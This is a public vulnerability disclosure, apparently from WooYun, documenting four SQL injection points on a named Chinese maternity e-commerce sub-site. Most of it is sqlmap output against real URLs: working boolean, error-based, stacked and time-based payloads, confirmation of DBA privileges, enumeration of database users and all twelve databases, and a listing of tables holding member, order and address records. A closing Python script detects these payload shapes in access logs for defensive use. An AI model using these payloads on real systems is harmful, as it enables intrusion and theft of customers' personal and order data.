
Vulnerability summary

Defect ID: wooyun-2015-0152732

Title: Multiple SQL injections on a 十月妈咪 sub-site (DBA privileges + over ten thousand users + 12 databases)

Vendor: 十月妈咪

Author: 路人甲

Submitted: 2015-11-11 00:27

Fixed: 2015-12-26 00:28

Disclosed: 2015-12-26 00:28

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-26: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Continuing to test the sub-sites!~~~

Detailed description:

First, the following

http://27.115.100.242/wap/detail/index?goods=2926
http://st.octmami.com/wap/detail/index?goods=2926
http://manage.st.octmami.com/wap/detail/index?goods=2926
http://svn.octmami.com/wap/detail/index?goods=2926
http://test2.st.octmami.com/wap/detail/index?goods=2926
http://test.st.octmami.com/wap/detail/index?goods=2926
http://t.st.octmami.com/wap/detail/index?goods=2926
http://dev.st.octmami.com/wap/detail/index?goods=2926
http://1.st.octmami.com/wap/detail/index?goods=2926
http://3.st.octmami.com/wap/detail/index?goods=2926
http://s2.st.octmami.com/wap/detail/index?goods=2926


are all the same,
so it is enough to test just one of them!~~~
Injection point 1:
http://st.octmami.com/wap/detail/index?goods=2926

[*] starting at 03:42:47
[03:42:47] [INFO] testing connection to the target URL
[03:42:48] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:42:48] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[03:42:49] [INFO] target URL is stable
[03:42:49] [INFO] testing if GET parameter 'goods' is dynamic
[03:42:49] [INFO] heuristics detected web page charset 'utf-8'
[03:42:49] [INFO] confirming that GET parameter 'goods' is dynamic
[03:42:49] [INFO] GET parameter 'goods' is dynamic
[03:42:50] [INFO] heuristic (basic) test shows that GET parameter 'goods' might
be injectable (possible DBMS: 'MySQL')
[03:42:50] [INFO] testing for SQL injection on GET parameter 'goods'
[03:42:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:42:50] [WARNING] reflective value(s) found and filtering out
[03:42:51] [INFO] GET parameter 'goods' seems to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable
[03:42:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[03:42:52] [INFO] GET parameter 'goods' is 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause' injectable
[03:42:52] [INFO] testing 'MySQL inline queries'
[03:42:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:42:52] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[03:43:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 stacked quer
ies' injectable
[03:43:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:44:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 AND time-bas
ed blind' injectable
[03:44:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:44:14] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:44:14] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[03:44:16] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[03:44:59] [INFO] testing 'Generic UNION query (27) - 1 to 20 columns'
GET parameter 'goods' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: goods
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods=2926 AND 5665=5665
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods=2926 AND (SELECT 4829 FROM(SELECT COUNT(*),CONCAT(0x717764627
1,(SELECT (CASE WHEN (4829=4829) THEN 1 ELSE 0 END)),0x7179756a71,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: goods=2926; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: goods=2926 AND SLEEP(5)
---
[03:49:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[03:49:40] [INFO] fetching current user
[03:49:40] [INFO] retrieved: chen@%
current user: 'chen@%'
[03:49:40] [INFO] fetching current database
[03:49:40] [INFO] retrieved: ecstore
current database: 'ecstore'
[03:49:40] [INFO] testing if current user is DBA
[03:49:40] [INFO] fetching current user
current user is DBA: True
database management system users [9]:
[*] ''@'localhost'
[*] 'chen'@'%'
[*] 'ecstore'@'localhost'
[*] 'proftpd'@'%'
[*] 'proftpd'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[03:51:03] [INFO] fetching database names
[03:51:03] [INFO] the SQL query used returns 12 entries
[03:51:03] [INFO] starting 10 threads
[03:51:04] [INFO] retrieved: mysql
[03:51:04] [INFO] retrieved: performance_schema
[03:51:04] [INFO] retrieved: information_schema
[03:51:04] [INFO] retrieved: test
[03:51:04] [INFO] retrieved: ecstore_new
[03:51:04] [INFO] retrieved: purchase
[03:51:04] [INFO] retrieved: server
[03:51:04] [INFO] retrieved: octmami
[03:51:04] [INFO] retrieved: ecstore
[03:51:04] [INFO] retrieved: corp
[03:51:04] [INFO] retrieved: youxi
[03:51:04] [INFO] retrieved: zentao
available databases [12]:
[*] corp
[*] ecstore
[*] ecstore_new
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao
Database: ecstore_new
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot | 224072 |
| oct_coupon_list | 81028 |
| sdb_image_image | 71715 |
| sdb_b2c_comment_goods_point | 27465 |
| oct_cps_log | 19161 |
| sdb_b2c_order_log | 15183 |
| sdb_b2c_members | 14474 |
| sdb_image_image_attach | 13150 |
| sdb_b2c_member_comments | 12571 |
| sdb_b2c_order_items | 10272 |
| sdb_b2c_order_objects | 10244 |
| sdb_b2c_products | 7366 |
| oct_verification_code | 6576 |
| oct_member_point | 6538 |
| sdb_operatorlog_normallogs | 5897 |
| oct_member_wap_info | 5688 |
| oct_advertisement_items | 5528 |
| sdb_b2c_goods_keywords | 5377 |
| oct_b2c_goods_spec_index | 5284 |
| sdb_b2c_goods | 5139 |
| sdb_b2c_member_coupon | 4697 |
| oct_member_weixin_bind | 4680 |
| sdb_b2c_order_pmt | 4605 |
| sdb_b2c_orders | 4581 |
| sdb_b2c_delivery_items | 3793 |
| sdb_ectools_regions | 3266 |
| sdb_b2c_member_addrs | 3199 |
| sdb_b2c_order_delivery | 2497 |
| sdb_b2c_delivery | 2492 |
| oct_recommend_loaction | 2305 |
| oct_member_weixin_bind3 | 2173 |
| sdb_pam_members | 1920 |
| sdb_b2c_goods_spec_index | 1672 |
| sdb_b2c_goods_type_props_value | 1606 |
| sdb_base_kvstore | 1579 |
| sdb_pam_log_desktop | 1515 |
| sdb_b2c_cart_objects | 1320 |
| sdb_b2c_type_brand | 1231 |
| sdb_apiactionlog_apilog | 1222 |
| oct_prompt_limit | 947 |
| sdb_b2c_member_point | 839 |
| sdb_base_app_content | 784 |
| oct_search_words | 673 |
| sdb_b2c_member_goods | 607 |
| sdb_desktop_tag_rel | 607 |
| sdb_base_cache_expires | 606 |
| oct_banner_info | 577 |
| oct_banner_location | 577 |
| sdb_b2c_sell_logs | 569 |
| sdb_ectools_analysis_logs | 559 |
| sdb_dbeav_meta_value_text | 517 |
| sdb_b2c_spec_values | 454 |
| sdb_dbeav_meta_value_longtext | 452 |
| sdb_ectools_order_bills | 421 |
| sdb_desktop_recycle | 418 |
| sdb_ectools_payments | 380 |
| sdb_b2c_brand | 335 |
| oct_prize | 322 |
| sdb_aftersales_return_product | 317 |
| sdb_base_setting | 317 |
| oct_advertisement | 300 |
| sdb_b2c_goods_type_props | 295 |
| oct_order_pmt | 275 |
| sdb_desktop_menus | 258 |
| sdb_b2c_order_cancel_reason | 235 |
| sdb_site_widgets_instance | 203 |
| oct_cps_valuation | 200 |
| oct_turn_table | 200 |
| oct_coupon_order_item | 186 |
| oct_brand_special | 153 |
| oct_stores | 140 |
| oct_cps_put | 121 |
| sdb_site_widgets | 121 |
| sdb_system_queue_mysql | 110 |
| oct_feedback | 102 |
| oct_stores_image | 99 |
| oct_special_product | 98 |
| sdb_b2c_goods_cat | 93 |
| sdb_b2c_goods_rate | 93 |
| sdb_site_themes_file | 93 |
| sdb_order_task_log | 82 |
| sdb_operatorlog_register | 79 |
| sdb_b2c_goods_type | 76 |
| sdb_b2c_goods_type_spec | 73 |
| sdb_content_article_bodys | 72 |
| sdb_b2c_goods_lv_price | 68 |
| sdb_search_associate | 63 |
| oct_service_call | 58 |
| sdb_search_delta | 58 |
| sdb_site_themes_tmpl | 57 |
| oct_cps_put_type | 54 |
| baby_face_get_stars | 52 |
| oct_cps_case | 50 |
| sdb_base_apps | 49 |
| oct_coupon_cate | 45 |
| oct_coupon_rule | 45 |
| oct_prompt_flash | 43 |
| sdb_ectools_refunds | 41 |
| oct_banner_dimension | 40 |
| sdb_content_article_indexs | 40 |
| oct_coupon_grant | 37 |
| oct_recommend_comment_cat | 36 |
| sdb_starbuy_special_goods | 35 |
| sdb_b2c_goods_promotion_ref | 34 |
| sdb_b2c_sales_rule_order | 31 |
| sdb_desktop_tag | 31 |
| sdb_dbeav_meta_value_varchar | 30 |
| sdb_b2c_dlycorp | 27 |
| sdb_b2c_member_systmpl | 26 |
| sdb_b2c_goods_virtual_cat | 25 |
| sdb_site_modules | 25 |
| sdb_couponlog_order_coupon_ref | 24 |
| sdb_couponlog_order_coupon_user | 24 |
| sdb_gift_ref | 24 |
| sdb_desktop_hasrole | 22 |
| sdb_b2c_coupons | 20 |
| sdb_b2c_specification | 20 |
| sdb_dbeav_meta_register | 18 |
| oct_recommend_dimension | 17 |
| sdb_desktop_users | 17 |
| sdb_wap_modules | 16 |
| sdb_dbeav_meta_value_int | 14 |
| sdb_pam_account | 14 |
| sdb_starbuy_special | 14 |
| oct_recommend_comment_define | 12 |
| oct_sm_task_items | 12 |
| sdb_base_crontab | 12 |
| sdb_wap_widgets | 12 |
| oct_recommend_comment_info | 10 |
| sdb_b2c_member_advance | 9 |
| sdb_content_article_nodes | 9 |
| sdb_site_menus | 9 |
| oct_search_hot | 8 |
| sdb_b2c_member_lv | 8 |
| oct_special_info | 7 |
| sdb_importexport_task | 7 |
| sdb_site_seo | 7 |
| oct_sm_queues | 6 |
| sdb_b2c_reship_items | 6 |
| sdb_desktop_roles | 6 |
| oct_channel | 5 |
| oct_employees | 5 |
| oct_goods_seckill | 5 |
| oct_prompt_activity | 5 |
| oct_sm_users | 5 |
| sdb_wap_themes_file | 5 |
| sdb_wap_themes_tmpl | 5 |
| sdb_wap_widgets_instance | 5 |
| oct_admin_group | 4 |
| oct_sm_tasks | 4 |
| sdb_b2c_dlytype | 4 |
| sdb_b2c_reship | 4 |
| oct_location | 3 |
| oct_sm_models | 3 |
| sdb_b2c_comment_goods_type | 3 |
| sdb_base_network | 3 |
| sdb_ectools_analysis | 3 |
| sdb_site_themes | 3 |
| sdb_starbuy_promotions_type | 3 |
| oct_agent | 2 |
| oct_business_district | 2 |
| sdb_b2c_orders_recommend | 2 |
| sdb_gift_cat | 2 |
| sdb_site_route_statics | 2 |
| oct_draw_list | 1 |
| oct_goods_ads | 1 |
| oct_sm_tags | 1 |
| sdb_b2c_goods_store_prompt | 1 |
| sdb_desktop_filter | 1 |
| sdb_ectools_currency | 1 |
| sdb_site_explorers | 1 |
| sdb_site_link | 1 |
| sdb_starbuy_cancelorder | 1 |
| sdb_starbuy_count_member_buy | 1 |
| sdb_wap_themes | 1 |
+---------------------------------+---------+


A new database? It seems to have quite a few users as well; surely it isn't just a test one???

[Screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg, 5.jpg]


Injection point 2:
http://st.octmami.com/wap/detail/specproduct (POST)
goods_id=2858&spec=24-306 28-346

[09:28:51] [INFO] testing connection to the target URL
[09:28:51] [INFO] heuristics detected web page charset 'ascii'
[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:28:52] [INFO] target URL is stable
[09:28:52] [INFO] testing if POST parameter 'goods_id' is dynamic
[09:28:52] [INFO] confirming that POST parameter 'goods_id' is dynamic
[09:28:52] [WARNING] POST parameter 'goods_id' does not appear dynamic
[09:28:53] [INFO] heuristic (basic) test shows that POST parameter 'goods_id' mi
ght be injectable (possible DBMS: 'MySQL')
[09:28:53] [INFO] testing for SQL injection on POST parameter 'goods_id'
[09:28:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:53] [WARNING] reflective value(s) found and filtering out
[09:28:53] [INFO] POST parameter 'goods_id' seems to be 'AND boolean-based blind
- WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:28:53] [INFO] POST parameter 'goods_id' is 'MySQL >= 5.0 AND error-based - W
HERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL inline queries'
[09:28:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:28:54] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:29:04] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 stacked
queries' injectable
[09:29:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:05] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 AND time
-based blind' injectable
[09:30:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:30:05] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:30:05] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:30:06] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:30:09] [INFO] testing 'Generic UNION query (87) - 1 to 20 columns'
POST parameter 'goods_id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[09:30:14] [INFO] testing if POST parameter 'spec' is dynamic
[09:30:14] [INFO] confirming that POST parameter 'spec' is dynamic
[09:30:14] [INFO] POST parameter 'spec' is dynamic
[09:30:14] [WARNING] heuristic (basic) test shows that POST parameter 'spec' mig
ht not be injectable
[09:30:14] [INFO] testing for SQL injection on POST parameter 'spec'
[09:30:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:30:17] [INFO] testing 'MySQL inline queries'
[09:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:30:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:19] [INFO] testing 'MySQL UNION query (87) - 1 to 10 columns'
[09:30:22] [INFO] testing 'Generic UNION query (87) - 1 to 10 columns'
[09:30:25] [WARNING] POST parameter 'spec' is not injectable
sqlmap identified the following injection points with a total of 116 HTTP(s) req
uests:
---
Place: POST
Parameter: goods_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods_id=2858 AND 9858=9858&spec=24-306 28-346
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods_id=2858 AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x717979
7871,(SELECT (CASE WHEN (8940=8940) THEN 1 ELSE 0 END)),0x71616a7271,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&spec=24-306 28-346
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: goods_id=2858; SELECT SLEEP(5)-- &spec=24-306 28-346
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: goods_id=2858 AND SLEEP(5)&spec=24-306 28-346
---
[09:30:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:30:25] [INFO] fetching current user
[09:30:26] [INFO] retrieved: chen@%
current user: 'chen@%'
[09:30:26] [INFO] fetching current database
[09:30:26] [INFO] retrieved: ecstore
current database: 'ecstore'
[09:30:26] [INFO] testing if current user is DBA
[09:30:26] [INFO] fetching current user
current user is DBA: True


Injection point 3:
http://st.octmami.com/wap/detail/checkstore (POST)
product_id=5353&buy_number=2

[09:31:33] [INFO] testing connection to the target URL
[09:31:34] [INFO] heuristics detected web page charset 'ascii'
[09:31:34] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:31:35] [INFO] target URL is stable
[09:31:35] [INFO] testing if POST parameter 'product_id' is dynamic
[09:31:35] [INFO] confirming that POST parameter 'product_id' is dynamic
[09:31:35] [INFO] POST parameter 'product_id' is dynamic
[09:31:35] [INFO] heuristic (basic) test shows that POST parameter 'product_id'
might be injectable (possible DBMS: 'MySQL')
[09:31:35] [INFO] testing for SQL injection on POST parameter 'product_id'
[09:31:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:31:35] [WARNING] reflective value(s) found and filtering out
[09:31:36] [INFO] POST parameter 'product_id' seems to be 'AND boolean-based bli
nd - WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:31:36] [INFO] POST parameter 'product_id' is 'MySQL >= 5.0 AND error-based -
WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL inline queries'
[09:31:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:31:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:31:47] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 stacke
d queries' injectable
[09:31:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:31:57] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 AND ti
me-based blind' injectable
[09:31:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:31:57] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:31:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:31:58] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:32:01] [INFO] testing 'Generic UNION query (49) - 1 to 20 columns'
POST parameter 'product_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
[09:32:04] [INFO] testing if POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] confirming that POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] POST parameter 'buy_number' is dynamic
[09:32:05] [INFO] heuristic (basic) test shows that POST parameter 'buy_number'
might be injectable (possible DBMS: 'MySQL')
[09:32:05] [INFO] testing for SQL injection on POST parameter 'buy_number'
[09:32:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:32:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:32:08] [INFO] testing 'MySQL inline queries'
[09:32:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:32:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:32:10] [INFO] testing 'MySQL UNION query (49) - 1 to 10 columns'
[09:32:13] [INFO] testing 'Generic UNION query (49) - 1 to 10 columns'
[09:32:16] [WARNING] POST parameter 'buy_number' is not injectable
sqlmap identified the following injection points with a total of 123 HTTP(s) req
uests:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=5353 AND 5490=5490&buy_number=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=5353 AND (SELECT 5614 FROM(SELECT COUNT(*),CONCAT(0x7166
656171,(SELECT (CASE WHEN (5614=5614) THEN 1 ELSE 0 END)),0x7164777071,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&buy_number=2
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: product_id=5353; SELECT SLEEP(5)-- &buy_number=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=5353 AND SLEEP(5)&buy_number=2
---
[09:32:17] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:32:17] [INFO] fetching current user
[09:32:17] [INFO] retrieved: chen@%
current user: 'chen@%'
[09:32:17] [INFO] fetching current database
[09:32:17] [INFO] retrieved: ecstore
current database: 'ecstore'
[09:32:17] [INFO] testing if current user is DBA
[09:32:17] [INFO] fetching current user
current user is DBA: True


Injection point 4:
http://st.octmami.com/wap/cart/insert (POST)
product_id=5353&quantity=2&quantity_type=add

[09:40:12] [INFO] testing connection to the target URL
[09:40:12] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=5353 AND 4348=4348&quantity=2&quantity_type=add
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=5353 AND (SELECT 4743 FROM(SELECT COUNT(*),CONCAT(0x7174
747671,(SELECT (CASE WHEN (4743=4743) THEN 1 ELSE 0 END)),0x7170637671,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2&quanti
ty_type=add
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: product_id=5353; SELECT SLEEP(5)-- &quantity=2&quantity_type=add
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=5353 AND SLEEP(5)&quantity=2&quantity_type=add
---
[09:40:12] [INFO] testing MySQL
[09:40:12] [WARNING] reflective value(s) found and filtering out
[09:40:12] [INFO] confirming MySQL
[09:40:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL >= 5.0.0
[09:40:13] [INFO] fetching current user
[09:40:13] [INFO] resumed: chen@%
current user: 'chen@%'
[09:40:13] [INFO] fetching current database
[09:40:13] [INFO] resumed: ecstore
current database: 'ecstore'
[09:40:13] [INFO] testing if current user is DBA
[09:40:13] [INFO] fetching current user
current user is DBA: True

Proof of vulnerability:

[Screenshots: 4.jpg, 5.jpg]


Remediation:

Fix by filtering the input.
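All four injection points above report the same four payload shapes (boolean `AND n=n`, error-based `FLOOR(RAND(0)*2) ... GROUP BY`, stacked `; SELECT SLEEP(n)`, time-based `AND SLEEP(n)`), which gives a defender something to alert on while the filtering fix is rolled out. The Python below is an added example, not part of the original report: it parses nginx combined-format access-log lines (constructed here) and flags the `goods`, `goods_id` and `product_id` parameters whose decoded values match those shapes; the log lines, IP addresses and hex constants are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Payload shapes copied from the sqlmap output in this report.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "stacked queries": re.compile(r";\s*SELECT\s+SLEEP\s*\(\s*\d+\s*\)", re.I),
    "time-based blind": re.compile(r"\bAND\s+SLEEP\s*\(\s*\d+\s*\)", re.I),
}

# Parameters the report shows as injectable; only these are inspected.
WATCHED_PARAMS = {"goods", "goods_id", "product_id"}

# nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Constructed sample log lines (not from the report); one clean request,
# one request per payload shape, and one hit on an unwatched parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:03:42:47 +0800] "GET /wap/detail/index?goods=2926 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Nov/2015:03:42:50 +0800] "GET /wap/detail/index?goods=2926%20AND%205665%3D5665 HTTP/1.1" 200 4120 "-" "sqlmap/1.0"',
    '10.0.0.9 - - [11/Nov/2015:03:44:14 +0800] "GET /wap/detail/index?goods=2926%20AND%20SLEEP%285%29 HTTP/1.1" 200 4120 "-" "sqlmap/1.0"',
    '10.0.0.9 - - [11/Nov/2015:03:43:14 +0800] "GET /wap/detail/index?goods=2926%3B%20SELECT%20SLEEP%285%29-- HTTP/1.1" 200 4120 "-" "sqlmap/1.0"',
    '10.0.0.9 - - [11/Nov/2015:03:42:52 +0800] "GET /wap/detail/index?goods=2926%20AND%20%28SELECT%204829%20FROM%28SELECT%20COUNT%28*%29%2CCONCAT%280x71776462%2C%28SELECT%20%28CASE%20WHEN%20%284829%3D4829%29%20THEN%201%20ELSE%200%20END%29%29%2C0x7179756a71%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 812 "-" "sqlmap/1.0"',
    '10.0.0.7 - - [11/Nov/2015:03:50:01 +0800] "GET /wap/search?kw=AND%201%3D1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def classify_params(params):
    """Return (param, signature) pairs whose decoded value matches a known shape."""
    hits = []
    for name, value in params:
        if name not in WATCHED_PARAMS:
            continue
        for label, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.append((name, label))
    return hits


def scan_line(line):
    """Parse one access-log line; return [(param, signature, ip)] or [] if clean/unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    # parse_qsl percent-decodes values ('%20' -> ' ', '%3D' -> '='), so the
    # regexes see the same text the database would have received.
    params = parse_qsl(query, keep_blank_values=True)
    return [(p, s, m.group("ip")) for p, s in classify_params(params)]


def scan_log(lines):
    """Aggregate distinct (param, signature) hits per source IP."""
    by_ip = {}
    for line in lines:
        for param, sig, ip in scan_line(line):
            by_ip.setdefault(ip, set()).add((param, sig))
    return by_ip


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

Default nginx logging records only the request line, so this catches the GET point at /wap/detail/index; the three POST points (goods_id, product_id) are only visible if request bodies are logged or the same check runs in a WAF or in the application itself.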

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined the report